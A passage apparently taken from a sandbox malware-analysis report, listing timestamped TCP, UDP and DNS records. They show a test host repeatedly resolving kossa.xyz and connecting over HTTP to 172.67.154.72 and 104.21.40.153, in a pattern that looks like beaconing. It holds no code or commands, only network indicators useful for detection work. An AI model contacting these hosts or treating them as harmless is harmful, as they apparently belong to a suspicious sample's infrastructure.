Jun 23, 2022 17:54:37.141222000 CEST	80	49743	172.67.154.72	192.168.2.3
Jun 23, 2022 17:54:37.141366959 CEST	49743	80	192.168.2.3	172.67.154.72
Jun 23, 2022 17:54:37.173758030 CEST	80	49743	172.67.154.72	192.168.2.3
Jun 23, 2022 17:54:37.484196901 CEST	80	49743	172.67.154.72	192.168.2.3
Jun 23, 2022 17:54:37.484416008 CEST	49743	80	192.168.2.3	172.67.154.72
Jun 23, 2022 17:54:37.517374039 CEST	80	49743	172.67.154.72	192.168.2.3
Jun 23, 2022 17:54:37.722713947 CEST	80	49743	172.67.154.72	192.168.2.3
Jun 23, 2022 17:54:37.723525047 CEST	49743	80	192.168.2.3	172.67.154.72
Jun 23, 2022 17:54:38.436321020 CEST	49744	80	192.168.2.3	172.67.154.72
Jun 23, 2022 17:54:38.468525887 CEST	80	49744	172.67.154.72	192.168.2.3
Jun 23, 2022 17:54:38.468648911 CEST	49744	80	192.168.2.3	172.67.154.72
Jun 23, 2022 17:54:38.472163916 CEST	49744	80	192.168.2.3	172.67.154.72
Jun 23, 2022 17:54:38.504229069 CEST	80	49744	172.67.154.72	192.168.2.3
Jun 23, 2022 17:54:38.504328012 CEST	49744	80	192.168.2.3	172.67.154.72
Jun 23, 2022 17:54:38.536420107 CEST	80	49744	172.67.154.72	192.168.2.3
Jun 23, 2022 17:54:38.845036030 CEST	80	49744	172.67.154.72	192.168.2.3
Jun 23, 2022 17:54:38.845256090 CEST	49744	80	192.168.2.3	172.67.154.72
Jun 23, 2022 17:54:38.845357895 CEST	80	49744	172.67.154.72	192.168.2.3
Jun 23, 2022 17:54:38.845438957 CEST	49744	80	192.168.2.3	172.67.154.72
Jun 23, 2022 17:54:38.877574921 CEST	80	49744	172.67.154.72	192.168.2.3
Jun 23, 2022 17:54:39.866887093 CEST	49745	80	192.168.2.3	104.21.40.153
Jun 23, 2022 17:54:39.883833885 CEST	80	49745	104.21.40.153	192.168.2.3
Jun 23, 2022 17:54:39.883953094 CEST	49745	80	192.168.2.3	104.21.40.153
Jun 23, 2022 17:54:39.886492014 CEST	49745	80	192.168.2.3	104.21.40.153
Jun 23, 2022 17:54:39.903594017 CEST	80	49745	104.21.40.153	192.168.2.3
Jun 23, 2022 17:54:39.903673887 CEST	49745	80	192.168.2.3	104.21.40.153
Jun 23, 2022 17:54:39.920392036 CEST	80	49745	104.21.40.153	192.168.2.3
Jun 23, 2022 17:54:40.249713898 CEST	80	49745	104.21.40.153	192.168.2.3
Jun 23, 2022 17:54:40.249761105 CEST	80	49745	104.21.40.153	192.168.2.3
Jun 23, 2022 17:54:40.249830961 CEST	49745	80	192.168.2.3	104.21.40.153
Jun 23, 2022 17:54:40.249897957 CEST	49745	80	192.168.2.3	104.21.40.153
Jun 23, 2022 17:54:40.266798973 CEST	80	49745	104.21.40.153	192.168.2.3
Jun 23, 2022 17:54:42.309146881 CEST	49746	80	192.168.2.3	172.67.154.72
Jun 23, 2022 17:54:42.341340065 CEST	80	49746	172.67.154.72	192.168.2.3
Jun 23, 2022 17:54:42.343955994 CEST	49746	80	192.168.2.3	172.67.154.72
Jun 23, 2022 17:54:42.346945047 CEST	49746	80	192.168.2.3	172.67.154.72
Jun 23, 2022 17:54:42.380894899 CEST	80	49746	172.67.154.72	192.168.2.3
Jun 23, 2022 17:54:42.383651018 CEST	49746	80	192.168.2.3	172.67.154.72
Jun 23, 2022 17:54:42.417906046 CEST	80	49746	172.67.154.72	192.168.2.3
Jun 23, 2022 17:54:42.724734068 CEST	80	49746	172.67.154.72	192.168.2.3
Jun 23, 2022 17:54:42.724874020 CEST	49746	80	192.168.2.3	172.67.154.72
Jun 23, 2022 17:54:42.757117033 CEST	80	49746	172.67.154.72	192.168.2.3
Jun 23, 2022 17:54:42.961307049 CEST	80	49746	172.67.154.72	192.168.2.3
Jun 23, 2022 17:54:42.961420059 CEST	49746	80	192.168.2.3	172.67.154.72
Jun 23, 2022 17:54:44.269737005 CEST	49747	80	192.168.2.3	172.67.154.72
Jun 23, 2022 17:54:44.302773952 CEST	80	49747	172.67.154.72	192.168.2.3
Jun 23, 2022 17:54:44.303009033 CEST	49747	80	192.168.2.3	172.67.154.72
Jun 23, 2022 17:54:44.305986881 CEST	49747	80	192.168.2.3	172.67.154.72
Jun 23, 2022 17:54:44.338363886 CEST	80	49747	172.67.154.72	192.168.2.3
Jun 23, 2022 17:54:44.338661909 CEST	49747	80	192.168.2.3	172.67.154.72
Jun 23, 2022 17:54:44.371105909 CEST	80	49747	172.67.154.72	192.168.2.3
Jun 23, 2022 17:54:44.695508003 CEST	80	49747	172.67.154.72	192.168.2.3
Jun 23, 2022 17:54:44.695698977 CEST	49747	80	192.168.2.3	172.67.154.72
Jun 23, 2022 17:54:44.695736885 CEST	80	49747	172.67.154.72	192.168.2.3
Jun 23, 2022 17:54:44.695832968 CEST	49747	80	192.168.2.3	172.67.154.72
Jun 23, 2022 17:54:44.728557110 CEST	80	49747	172.67.154.72	192.168.2.3
Jun 23, 2022 17:54:47.267076969 CEST	49749	80	192.168.2.3	172.67.154.72
Jun 23, 2022 17:54:47.299616098 CEST	80	49749	172.67.154.72	192.168.2.3
Jun 23, 2022 17:54:47.299771070 CEST	49749	80	192.168.2.3	172.67.154.72
Jun 23, 2022 17:54:47.375833988 CEST	49749	80	192.168.2.3	172.67.154.72
Jun 23, 2022 17:54:47.408014059 CEST	80	49749	172.67.154.72	192.168.2.3
Jun 23, 2022 17:54:47.408128023 CEST	49749	80	192.168.2.3	172.67.154.72
Jun 23, 2022 17:54:47.440428972 CEST	80	49749	172.67.154.72	192.168.2.3
Jun 23, 2022 17:54:47.760540009 CEST	80	49749	172.67.154.72	192.168.2.3
Jun 23, 2022 17:54:47.760590076 CEST	80	49749	172.67.154.72	192.168.2.3
Jun 23, 2022 17:54:47.760878086 CEST	49749	80	192.168.2.3	172.67.154.72
Jun 23, 2022 17:54:48.548027992 CEST	49749	80	192.168.2.3	172.67.154.72
Jun 23, 2022 17:54:48.580526114 CEST	80	49749	172.67.154.72	192.168.2.3
Jun 23, 2022 17:54:50.091150045 CEST	49757	80	192.168.2.3	172.67.154.72
Jun 23, 2022 17:54:50.123351097 CEST	80	49757	172.67.154.72	192.168.2.3
Jun 23, 2022 17:54:50.123565912 CEST	49757	80	192.168.2.3	172.67.154.72
Jun 23, 2022 17:54:50.135453939 CEST	49757	80	192.168.2.3	172.67.154.72

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Jun 23, 2022 17:54:33.833693981 CEST	49316	53	192.168.2.3	8.8.8.8
Jun 23, 2022 17:54:33.859457970 CEST	53	49316	8.8.8.8	192.168.2.3
Jun 23, 2022 17:54:35.517091990 CEST	56417	53	192.168.2.3	8.8.8.8
Jun 23, 2022 17:54:35.536612988 CEST	53	56417	8.8.8.8	192.168.2.3
Jun 23, 2022 17:54:37.046273947 CEST	55923	53	192.168.2.3	8.8.8.8
Jun 23, 2022 17:54:37.070851088 CEST	53	55923	8.8.8.8	192.168.2.3
Jun 23, 2022 17:54:38.413971901 CEST	57723	53	192.168.2.3	8.8.8.8
Jun 23, 2022 17:54:38.431252003 CEST	53	57723	8.8.8.8	192.168.2.3
Jun 23, 2022 17:54:39.833098888 CEST	58116	53	192.168.2.3	8.8.8.8
Jun 23, 2022 17:54:39.858500004 CEST	53	58116	8.8.8.8	192.168.2.3
Jun 23, 2022 17:54:42.271841049 CEST	57421	53	192.168.2.3	8.8.8.8
Jun 23, 2022 17:54:42.305263996 CEST	53	57421	8.8.8.8	192.168.2.3
Jun 23, 2022 17:54:44.249469042 CEST	65358	53	192.168.2.3	8.8.8.8
Jun 23, 2022 17:54:44.268577099 CEST	53	65358	8.8.8.8	192.168.2.3
Jun 23, 2022 17:54:47.204190016 CEST	53802	53	192.168.2.3	8.8.8.8
Jun 23, 2022 17:54:47.230014086 CEST	53	53802	8.8.8.8	192.168.2.3
Jun 23, 2022 17:54:50.070828915 CEST	63332	53	192.168.2.3	8.8.8.8
Jun 23, 2022 17:54:50.089931011 CEST	53	63332	8.8.8.8	192.168.2.3
Jun 23, 2022 17:54:52.207909107 CEST	49327	53	192.168.2.3	8.8.8.8
Jun 23, 2022 17:54:52.227092981 CEST	53	49327	8.8.8.8	192.168.2.3
Jun 23, 2022 17:54:54.671829939 CEST	58981	53	192.168.2.3	8.8.8.8
Jun 23, 2022 17:54:54.695344925 CEST	53	58981	8.8.8.8	192.168.2.3
Jun 23, 2022 17:54:56.328485966 CEST	64452	53	192.168.2.3	8.8.8.8
Jun 23, 2022 17:54:56.346199989 CEST	53	64452	8.8.8.8	192.168.2.3
Jun 23, 2022 17:54:57.859044075 CEST	61380	53	192.168.2.3	8.8.8.8
Jun 23, 2022 17:54:57.878499985 CEST	53	61380	8.8.8.8	192.168.2.3
Jun 23, 2022 17:54:59.359349012 CEST	63146	53	192.168.2.3	8.8.8.8
Jun 23, 2022 17:54:59.376538992 CEST	53	63146	8.8.8.8	192.168.2.3
Jun 23, 2022 17:55:00.776829958 CEST	52985	53	192.168.2.3	8.8.8.8
Jun 23, 2022 17:55:00.796344042 CEST	53	52985	8.8.8.8	192.168.2.3
Jun 23, 2022 17:55:02.366936922 CEST	58625	53	192.168.2.3	8.8.8.8
Jun 23, 2022 17:55:02.386096954 CEST	53	58625	8.8.8.8	192.168.2.3
Jun 23, 2022 17:55:03.948007107 CEST	52810	53	192.168.2.3	8.8.8.8
Jun 23, 2022 17:55:03.969122887 CEST	53	52810	8.8.8.8	192.168.2.3
Jun 23, 2022 17:55:07.364010096 CEST	50778	53	192.168.2.3	8.8.8.8
Jun 23, 2022 17:55:07.383429050 CEST	53	50778	8.8.8.8	192.168.2.3
Jun 23, 2022 17:55:08.991691113 CEST	55151	53	192.168.2.3	8.8.8.8
Jun 23, 2022 17:55:09.008948088 CEST	53	55151	8.8.8.8	192.168.2.3
Jun 23, 2022 17:55:10.683821917 CEST	59795	53	192.168.2.3	8.8.8.8
Jun 23, 2022 17:55:10.703425884 CEST	53	59795	8.8.8.8	192.168.2.3
Jun 23, 2022 17:55:12.016415119 CEST	59390	53	192.168.2.3	8.8.8.8
Jun 23, 2022 17:55:12.039047003 CEST	53	59390	8.8.8.8	192.168.2.3
Jun 23, 2022 17:55:13.382803917 CEST	64816	53	192.168.2.3	8.8.8.8
Jun 23, 2022 17:55:13.407774925 CEST	53	64816	8.8.8.8	192.168.2.3
Jun 23, 2022 17:55:15.005296946 CEST	53816	53	192.168.2.3	8.8.8.8
Jun 23, 2022 17:55:15.025069952 CEST	53	53816	8.8.8.8	192.168.2.3
Jun 23, 2022 17:55:16.487935066 CEST	60640	53	192.168.2.3	8.8.8.8
Jun 23, 2022 17:55:16.508002996 CEST	53	60640	8.8.8.8	192.168.2.3
Jun 23, 2022 17:55:18.880110025 CEST	52581	53	192.168.2.3	8.8.8.8
Jun 23, 2022 17:55:18.899779081 CEST	53	52581	8.8.8.8	192.168.2.3
Jun 23, 2022 17:55:20.849235058 CEST	50450	53	192.168.2.3	8.8.8.8
Jun 23, 2022 17:55:20.869082928 CEST	53	50450	8.8.8.8	192.168.2.3
Jun 23, 2022 17:55:22.244772911 CEST	64941	53	192.168.2.3	8.8.8.8
Jun 23, 2022 17:55:22.262568951 CEST	53	64941	8.8.8.8	192.168.2.3
Jun 23, 2022 17:55:26.274383068 CEST	61877	53	192.168.2.3	8.8.8.8
Jun 23, 2022 17:55:26.293586969 CEST	53	61877	8.8.8.8	192.168.2.3
Jun 23, 2022 17:55:33.486325979 CEST	62547	53	192.168.2.3	8.8.8.8
Jun 23, 2022 17:55:33.503941059 CEST	53	62547	8.8.8.8	192.168.2.3
Jun 23, 2022 17:55:36.560930014 CEST	60110	53	192.168.2.3	8.8.8.8
Jun 23, 2022 17:55:36.578289032 CEST	53	60110	8.8.8.8	192.168.2.3
Jun 23, 2022 17:55:40.570740938 CEST	49230	53	192.168.2.3	8.8.8.8
Jun 23, 2022 17:55:40.590874910 CEST	53	49230	8.8.8.8	192.168.2.3
Jun 23, 2022 17:55:42.235366106 CEST	57442	53	192.168.2.3	8.8.8.8
Jun 23, 2022 17:55:42.254795074 CEST	53	57442	8.8.8.8	192.168.2.3
Jun 23, 2022 17:55:45.719465971 CEST	65334	53	192.168.2.3	8.8.8.8
Jun 23, 2022 17:55:45.739217043 CEST	53	65334	8.8.8.8	192.168.2.3
Jun 23, 2022 17:55:50.492064953 CEST	52487	53	192.168.2.3	8.8.8.8
Jun 23, 2022 17:55:50.511487961 CEST	53	52487	8.8.8.8	192.168.2.3
Jun 23, 2022 17:55:53.366695881 CEST	51994	53	192.168.2.3	8.8.8.8
Jun 23, 2022 17:55:53.386226892 CEST	53	51994	8.8.8.8	192.168.2.3
Jun 23, 2022 17:55:55.533931971 CEST	51658	53	192.168.2.3	8.8.8.8
Jun 23, 2022 17:55:55.552799940 CEST	53	51658	8.8.8.8	192.168.2.3
Jun 23, 2022 17:55:58.096735954 CEST	58950	53	192.168.2.3	8.8.8.8
Jun 23, 2022 17:55:58.114485025 CEST	53	58950	8.8.8.8	192.168.2.3
Jun 23, 2022 17:56:00.509530067 CEST	53883	53	192.168.2.3	8.8.8.8
Jun 23, 2022 17:56:00.529114008 CEST	53	53883	8.8.8.8	192.168.2.3
Jun 23, 2022 17:56:02.044512987 CEST	59065	53	192.168.2.3	8.8.8.8
Jun 23, 2022 17:56:02.063860893 CEST	53	59065	8.8.8.8	192.168.2.3
Jun 23, 2022 17:56:04.141248941 CEST	55686	53	192.168.2.3	8.8.8.8
Jun 23, 2022 17:56:04.160404921 CEST	53	55686	8.8.8.8	192.168.2.3
Jun 23, 2022 17:56:08.598506927 CEST	64589	53	192.168.2.3	8.8.8.8
Jun 23, 2022 17:56:08.618109941 CEST	53	64589	8.8.8.8	192.168.2.3
Jun 23, 2022 17:56:11.030992985 CEST	64934	53	192.168.2.3	8.8.8.8
Jun 23, 2022 17:56:11.050276995 CEST	53	64934	8.8.8.8	192.168.2.3
Jun 23, 2022 17:56:13.735444069 CEST	55795	53	192.168.2.3	8.8.8.8
Jun 23, 2022 17:56:13.752243996 CEST	53	55795	8.8.8.8	192.168.2.3
Jun 23, 2022 17:56:16.851468086 CEST	64635	53	192.168.2.3	8.8.8.8
Jun 23, 2022 17:56:16.868690968 CEST	53	64635	8.8.8.8	192.168.2.3
Jun 23, 2022 17:56:19.753016949 CEST	55269	53	192.168.2.3	8.8.8.8
Jun 23, 2022 17:56:19.772675037 CEST	53	55269	8.8.8.8	192.168.2.3
Jun 23, 2022 17:56:20.715711117 CEST	63083	53	192.168.2.3	8.8.8.8
Jun 23, 2022 17:56:20.735198021 CEST	53	63083	8.8.8.8	192.168.2.3

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class
Jun 23, 2022 17:54:33.833693981 CEST	192.168.2.3	8.8.8.8	0xc3fd	Standard query (0)	kossa.xyz	A (IP address)	IN (0x0001)
Jun 23, 2022 17:54:35.517091990 CEST	192.168.2.3	8.8.8.8	0xcba5	Standard query (0)	kossa.xyz	A (IP address)	IN (0x0001)
Jun 23, 2022 17:54:37.046273947 CEST	192.168.2.3	8.8.8.8	0x12b1	Standard query (0)	kossa.xyz	A (IP address)	IN (0x0001)
Jun 23, 2022 17:54:38.413971901 CEST	192.168.2.3	8.8.8.8	0xe208	Standard query (0)	kossa.xyz	A (IP address)	IN (0x0001)
Jun 23, 2022 17:54:39.833098888 CEST	192.168.2.3	8.8.8.8	0xa3d5	Standard query (0)	kossa.xyz	A (IP address)	IN (0x0001)
Jun 23, 2022 17:54:42.271841049 CEST	192.168.2.3	8.8.8.8	0xa2cd	Standard query (0)	kossa.xyz	A (IP address)	IN (0x0001)
Jun 23, 2022 17:54:44.249469042 CEST	192.168.2.3	8.8.8.8	0x75a1	Standard query (0)	kossa.xyz	A (IP address)	IN (0x0001)
Jun 23, 2022 17:54:47.204190016 CEST	192.168.2.3	8.8.8.8	0x388c	Standard query (0)	kossa.xyz	A (IP address)	IN (0x0001)
Jun 23, 2022 17:54:50.070828915 CEST	192.168.2.3	8.8.8.8	0x1705	Standard query (0)	kossa.xyz	A (IP address)	IN (0x0001)
Jun 23, 2022 17:54:52.207909107 CEST	192.168.2.3	8.8.8.8	0x1d5c	Standard query (0)	kossa.xyz	A (IP address)	IN (0x0001)
Jun 23, 2022 17:54:54.671829939 CEST	192.168.2.3	8.8.8.8	0xe586	Standard query (0)	kossa.xyz	A (IP address)	IN (0x0001)
Jun 23, 2022 17:54:56.328485966 CEST	192.168.2.3	8.8.8.8	0xf6b9	Standard query (0)	kossa.xyz	A (IP address)	IN (0x0001)
Jun 23, 2022 17:54:57.859044075 CEST	192.168.2.3	8.8.8.8	0x857	Standard query (0)	kossa.xyz	A (IP address)	IN (0x0001)
Jun 23, 2022 17:54:59.359349012 CEST	192.168.2.3	8.8.8.8	0x5357	Standard query (0)	kossa.xyz	A (IP address)	IN (0x0001)
Jun 23, 2022 17:55:00.776829958 CEST	192.168.2.3	8.8.8.8	0xc00f	Standard query (0)	kossa.xyz	A (IP address)	IN (0x0001)
Jun 23, 2022 17:55:02.366936922 CEST	192.168.2.3	8.8.8.8	0x7338	Standard query (0)	kossa.xyz	A (IP address)	IN (0x0001)
Jun 23, 2022 17:55:03.948007107 CEST	192.168.2.3	8.8.8.8	0x858	Standard query (0)	kossa.xyz	A (IP address)	IN (0x0001)
Jun 23, 2022 17:55:07.364010096 CEST	192.168.2.3	8.8.8.8	0xfd0e	Standard query (0)	kossa.xyz	A (IP address)	IN (0x0001)
Jun 23, 2022 17:55:08.991691113 CEST	192.168.2.3	8.8.8.8	0x7440	Standard query (0)	kossa.xyz	A (IP address)	IN (0x0001)
Jun 23, 2022 17:55:10.683821917 CEST	192.168.2.3	8.8.8.8	0xa8a4	Standard query (0)	kossa.xyz	A (IP address)	IN (0x0001)
Jun 23, 2022 17:55:12.016415119 CEST	192.168.2.3	8.8.8.8	0x592	Standard query (0)	kossa.xyz	A (IP address)	IN (0x0001)
Jun 23, 2022 17:55:13.382803917 CEST	192.168.2.3	8.8.8.8	0x657b	Standard query (0)	kossa.xyz	A (IP address)	IN (0x0001)
Jun 23, 2022 17:55:15.005296946 CEST	192.168.2.3	8.8.8.8	0x2505	Standard query (0)	kossa.xyz	A (IP address)	IN (0x0001)
Jun 23, 2022 17:55:16.487935066 CEST	192.168.2.3	8.8.8.8	0x2e94	Standard query (0)	kossa.xyz	A (IP address)	IN (0x0001)
Jun 23, 2022 17:55:18.880110025 CEST	192.168.2.3	8.8.8.8	0x255e	Standard query (0)	kossa.xyz	A (IP address)	IN (0x0001)
Jun 23, 2022 17:55:20.849235058 CEST	192.168.2.3	8.8.8.8	0xde93	Standard query (0)	kossa.xyz	A (IP address)	IN (0x0001)
Jun 23, 2022 17:55:22.244772911 CEST	192.168.2.3	8.8.8.8	0x9f80	Standard query (0)	kossa.xyz	A (IP address)	IN (0x0001)
Jun 23, 2022 17:55:26.274383068 CEST	192.168.2.3	8.8.8.8	0xa552	Standard query (0)	kossa.xyz	A (IP address)	IN (0x0001)
Jun 23, 2022 17:55:33.486325979 CEST	192.168.2.3	8.8.8.8	0xf39	Standard query (0)	kossa.xyz	A (IP address)	IN (0x0001)
Jun 23, 2022 17:55:36.560930014 CEST	192.168.2.3	8.8.8.8	0xfb89	Standard query (0)	kossa.xyz	A (IP address)	IN (0x0001)
Jun 23, 2022 17:55:40.570740938 CEST	192.168.2.3	8.8.8.8	0x7f71	Standard query (0)	kossa.xyz	A (IP address)	IN (0x0001)
Jun 23, 2022 17:55:42.235366106 CEST	192.168.2.3	8.8.8.8	0x2bfc	Standard query (0)	kossa.xyz	A (IP address)	IN (0x0001)
Jun 23, 2022 17:55:45.719465971 CEST	192.168.2.3	8.8.8.8	0xc204	Standard query (0)	kossa.xyz	A (IP address)	IN (0x0001)
Jun 23, 2022 17:55:50.492064953 CEST	192.168.2.3	8.8.8.8	0x473a	Standard query (0)	kossa.xyz	A (IP address)	IN (0x0001)
Jun 23, 2022 17:55:53.366695881 CEST	192.168.2.3	8.8.8.8	0xfec	Standard query (0)	kossa.xyz	A (IP address)	IN (0x0001)
Jun 23, 2022 17:55:55.533931971 CEST	192.168.2.3	8.8.8.8	0x9e3f	Standard query (0)	kossa.xyz	A (IP address)	IN (0x0001)
Jun 23, 2022 17:55:58.096735954 CEST	192.168.2.3	8.8.8.8	0x11e3	Standard query (0)	kossa.xyz	A (IP address)	IN (0x0001)
Jun 23, 2022 17:56:00.509530067 CEST	192.168.2.3	8.8.8.8	0x29be	Standard query (0)	kossa.xyz	A (IP address)	IN (0x0001)
Jun 23, 2022 17:56:02.044512987 CEST	192.168.2.3	8.8.8.8	0xfd3	Standard query (0)	kossa.xyz	A (IP address)	IN (0x0001)
Jun 23, 2022 17:56:04.141248941 CEST	192.168.2.3	8.8.8.8	0x29c8	Standard query (0)	kossa.xyz	A (IP address)	IN (0x0001)
Jun 23, 2022 17:56:08.598506927 CEST	192.168.2.3	8.8.8.8	0xd3b9	Standard query (0)	kossa.xyz	A (IP address)	IN (0x0001)
Jun 23, 2022 17:56:11.030992985 CEST	192.168.2.3	8.8.8.8	0x3c9e	Standard query (0)	kossa.xyz	A (IP address)	IN (0x0001)
Jun 23, 2022 17:56:13.735444069 CEST	192.168.2.3	8.8.8.8	0x2c4c	Standard query (0)	kossa.xyz	A (IP address)	IN (0x0001)
Jun 23, 2022 17:56:16.851468086 CEST	192.168.2.3	8.8.8.8	0xcebe	Standard query (0)	kossa.xyz	A (IP address)	IN (0x0001)
Jun 23, 2022 17:56:19.753016949 CEST	192.168.2.3	8.8.8.8	0xf3b6	Standard query (0)	kossa.xyz	A (IP address)	IN (0x0001)
Jun 23, 2022 17:56:20.715711117 CEST	192.168.2.3	8.8.8.8	0x7fc1	Standard query (0)	kossa.xyz	A (IP address)	IN (0x0001)

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	Address	Type	Class
Jun 23, 2022 17:54:33.859457970 CEST	8.8.8.8	192.168.2.3	0xc3fd	No error (0)	kossa.xyz	172.67.154.72	A (IP address)	IN (0x0001)
Jun 23, 2022 17:54:33.859457970 CEST	8.8.8.8	192.168.2.3	0xc3fd	No error (0)	kossa.xyz	104.21.40.153	A (IP address)	IN (0x0001)
Jun 23, 2022 17:54:35.536612988 CEST	8.8.8.8	192.168.2.3	0xcba5	No error (0)	kossa.xyz	172.67.154.72	A (IP address)	IN (0x0001)
Jun 23, 2022 17:54:35.536612988 CEST	8.8.8.8	192.168.2.3	0xcba5	No error (0)	kossa.xyz	104.21.40.153	A (IP address)	IN (0x0001)
Jun 23, 2022 17:54:37.070851088 CEST	8.8.8.8	192.168.2.3	0x12b1	No error (0)	kossa.xyz	172.67.154.72	A (IP address)	IN (0x0001)
Jun 23, 2022 17:54:37.070851088 CEST	8.8.8.8	192.168.2.3	0x12b1	No error (0)	kossa.xyz	104.21.40.153	A (IP address)	IN (0x0001)
Jun 23, 2022 17:54:38.431252003 CEST	8.8.8.8	192.168.2.3	0xe208	No error (0)	kossa.xyz	172.67.154.72	A (IP address)	IN (0x0001)
Jun 23, 2022 17:54:38.431252003 CEST	8.8.8.8	192.168.2.3	0xe208	No error (0)	kossa.xyz	104.21.40.153	A (IP address)	IN (0x0001)
Jun 23, 2022 17:54:39.858500004 CEST	8.8.8.8	192.168.2.3	0xa3d5	No error (0)	kossa.xyz	104.21.40.153	A (IP address)	IN (0x0001)
Jun 23, 2022 17:54:39.858500004 CEST	8.8.8.8	192.168.2.3	0xa3d5	No error (0)	kossa.xyz	172.67.154.72	A (IP address)	IN (0x0001)
Jun 23, 2022 17:54:42.305263996 CEST	8.8.8.8	192.168.2.3	0xa2cd	No error (0)	kossa.xyz	172.67.154.72	A (IP address)	IN (0x0001)
Jun 23, 2022 17:54:42.305263996 CEST	8.8.8.8	192.168.2.3	0xa2cd	No error (0)	kossa.xyz	104.21.40.153	A (IP address)	IN (0x0001)
Jun 23, 2022 17:54:44.268577099 CEST	8.8.8.8	192.168.2.3	0x75a1	No error (0)	kossa.xyz	172.67.154.72	A (IP address)	IN (0x0001)
Jun 23, 2022 17:54:44.268577099 CEST	8.8.8.8	192.168.2.3	0x75a1	No error (0)	kossa.xyz	104.21.40.153	A (IP address)	IN (0x0001)
Jun 23, 2022 17:54:47.230014086 CEST	8.8.8.8	192.168.2.3	0x388c	No error (0)	kossa.xyz	172.67.154.72	A (IP address)	IN (0x0001)
Jun 23, 2022 17:54:47.230014086 CEST	8.8.8.8	192.168.2.3	0x388c	No error (0)	kossa.xyz	104.21.40.153	A (IP address)	IN (0x0001)
Jun 23, 2022 17:54:50.089931011 CEST	8.8.8.8	192.168.2.3	0x1705	No error (0)	kossa.xyz	172.67.154.72	A (IP address)	IN (0x0001)
Jun 23, 2022 17:54:50.089931011 CEST	8.8.8.8	192.168.2.3	0x1705	No error (0)	kossa.xyz	104.21.40.153	A (IP address)	IN (0x0001)
Jun 23, 2022 17:54:52.227092981 CEST	8.8.8.8	192.168.2.3	0x1d5c	No error (0)	kossa.xyz	172.67.154.72	A (IP address)	IN (0x0001)
Jun 23, 2022 17:54:52.227092981 CEST	8.8.8.8	192.168.2.3	0x1d5c	No error (0)	kossa.xyz	104.21.40.153	A (IP address)	IN (0x0001)
Jun 23, 2022 17:54:54.695344925 CEST	8.8.8.8	192.168.2.3	0xe586	No error (0)	kossa.xyz	104.21.40.153	A (IP address)	IN (0x0001)
Jun 23, 2022 17:54:54.695344925 CEST	8.8.8.8	192.168.2.3	0xe586	No error (0)	kossa.xyz	172.67.154.72	A (IP address)	IN (0x0001)
Jun 23, 2022 17:54:56.346199989 CEST	8.8.8.8	192.168.2.3	0xf6b9	No error (0)	kossa.xyz	104.21.40.153	A (IP address)	IN (0x0001)
Jun 23, 2022 17:54:56.346199989 CEST	8.8.8.8	192.168.2.3	0xf6b9	No error (0)	kossa.xyz	172.67.154.72	A (IP address)	IN (0x0001)
Jun 23, 2022 17:54:57.878499985 CEST	8.8.8.8	192.168.2.3	0x857	No error (0)	kossa.xyz	172.67.154.72	A (IP address)	IN (0x0001)
Jun 23, 2022 17:54:57.878499985 CEST	8.8.8.8	192.168.2.3	0x857	No error (0)	kossa.xyz	104.21.40.153	A (IP address)	IN (0x0001)
Jun 23, 2022 17:54:59.376538992 CEST	8.8.8.8	192.168.2.3	0x5357	No error (0)	kossa.xyz	172.67.154.72	A (IP address)	IN (0x0001)
Jun 23, 2022 17:54:59.376538992 CEST	8.8.8.8	192.168.2.3	0x5357	No error (0)	kossa.xyz	104.21.40.153	A (IP address)	IN (0x0001)
Jun 23, 2022 17:55:00.796344042 CEST	8.8.8.8	192.168.2.3	0xc00f	No error (0)	kossa.xyz	172.67.154.72	A (IP address)	IN (0x0001)
Jun 23, 2022 17:55:00.796344042 CEST	8.8.8.8	192.168.2.3	0xc00f	No error (0)	kossa.xyz	104.21.40.153	A (IP address)	IN (0x0001)
Jun 23, 2022 17:55:02.386096954 CEST	8.8.8.8	192.168.2.3	0x7338	No error (0)	kossa.xyz	172.67.154.72	A (IP address)	IN (0x0001)
Jun 23, 2022 17:55:02.386096954 CEST	8.8.8.8	192.168.2.3	0x7338	No error (0)	kossa.xyz	104.21.40.153	A (IP address)	IN (0x0001)
Jun 23, 2022 17:55:03.969122887 CEST	8.8.8.8	192.168.2.3	0x858	No error (0)	kossa.xyz	172.67.154.72	A (IP address)	IN (0x0001)
Jun 23, 2022 17:55:03.969122887 CEST	8.8.8.8	192.168.2.3	0x858	No error (0)	kossa.xyz	104.21.40.153	A (IP address)	IN (0x0001)
Jun 23, 2022 17:55:07.383429050 CEST	8.8.8.8	192.168.2.3	0xfd0e	No error (0)	kossa.xyz	172.67.154.72	A (IP address)	IN (0x0001)
Jun 23, 2022 17:55:07.383429050 CEST	8.8.8.8	192.168.2.3	0xfd0e	No error (0)	kossa.xyz	104.21.40.153	A (IP address)	IN (0x0001)
Jun 23, 2022 17:55:09.008948088 CEST	8.8.8.8	192.168.2.3	0x7440	No error (0)	kossa.xyz	172.67.154.72	A (IP address)	IN (0x0001)
Jun 23, 2022 17:55:09.008948088 CEST	8.8.8.8	192.168.2.3	0x7440	No error (0)	kossa.xyz	104.21.40.153	A (IP address)	IN (0x0001)
Jun 23, 2022 17:55:10.703425884 CEST	8.8.8.8	192.168.2.3	0xa8a4	No error (0)	kossa.xyz	104.21.40.153	A (IP address)	IN (0x0001)
Jun 23, 2022 17:55:10.703425884 CEST	8.8.8.8	192.168.2.3	0xa8a4	No error (0)	kossa.xyz	172.67.154.72	A (IP address)	IN (0x0001)
Jun 23, 2022 17:55:12.039047003 CEST	8.8.8.8	192.168.2.3	0x592	No error (0)	kossa.xyz	104.21.40.153	A (IP address)	IN (0x0001)
Jun 23, 2022 17:55:12.039047003 CEST	8.8.8.8	192.168.2.3	0x592	No error (0)	kossa.xyz	172.67.154.72	A (IP address)	IN (0x0001)
Jun 23, 2022 17:55:13.407774925 CEST	8.8.8.8	192.168.2.3	0x657b	No error (0)	kossa.xyz	104.21.40.153	A (IP address)	IN (0x0001)
Jun 23, 2022 17:55:13.407774925 CEST	8.8.8.8	192.168.2.3	0x657b	No error (0)	kossa.xyz	172.67.154.72	A (IP address)	IN (0x0001)
Jun 23, 2022 17:55:15.025069952 CEST	8.8.8.8	192.168.2.3	0x2505	No error (0)	kossa.xyz	104.21.40.153	A (IP address)	IN (0x0001)
Jun 23, 2022 17:55:15.025069952 CEST	8.8.8.8	192.168.2.3	0x2505	No error (0)	kossa.xyz	172.67.154.72	A (IP address)	IN (0x0001)
